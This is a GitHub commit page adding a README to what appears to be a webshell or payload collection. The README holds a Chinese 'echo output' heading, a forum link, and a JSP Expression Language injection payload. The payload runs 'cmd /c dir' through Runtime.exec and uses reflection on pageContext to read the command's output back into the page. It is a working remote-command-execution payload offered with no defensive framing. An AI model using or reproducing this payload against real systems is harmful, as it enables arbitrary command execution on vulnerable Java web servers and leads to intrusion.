Skip to content

Commit 77fce45

Browse files
FirebaskyFirebasky
authored
Create Readme.md
1 parent cf2be58 commit 77fce45

1 file changed

Lines changed: 22 additions & 0 deletions

File tree

shell/EL/Readme.md

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
# EL
2+
3+
## 回显
4+
5+
https://forum.butian.net/share/886
6+
7+
```jsp
8+
${
9+
pageContext.setAttribute("inputStream", Runtime.getRuntime().exec("cmd /c dir").getInputStream());
10+
Thread.sleep(1000);
11+
pageContext.setAttribute("inputStreamAvailable", pageContext.getAttribute("inputStream").available());
12+
pageContext.setAttribute("byteBufferClass", Class.forName("java.nio.ByteBuffer"));
13+
pageContext.setAttribute("allocateMethod", pageContext.getAttribute("byteBufferClass").getMethod("allocate", Integer.TYPE));
14+
pageContext.setAttribute("heapByteBuffer", pageContext.getAttribute("allocateMethod").invoke(null, pageContext.getAttribute("inputStreamAvailable")));
15+
pageContext.getAttribute("inputStream").read(pageContext.getAttribute("heapByteBuffer").array(), 0, pageContext.getAttribute("inputStreamAvailable"));
16+
pageContext.setAttribute("byteArrType", pageContext.getAttribute("heapByteBuffer").array().getClass());
17+
pageContext.setAttribute("stringClass", Class.forName("java.lang.String"));
18+
pageContext.setAttribute("stringConstructor", pageContext.getAttribute("stringClass").getConstructor(pageContext.getAttribute("byteArrType")));
19+
pageContext.setAttribute("stringRes", pageContext.getAttribute("stringConstructor").newInstance(pageContext.getAttribute("heapByteBuffer").array()));
20+
pageContext.getAttribute("stringRes")
21+
}
22+
```

0 commit comments

Comments
 (0)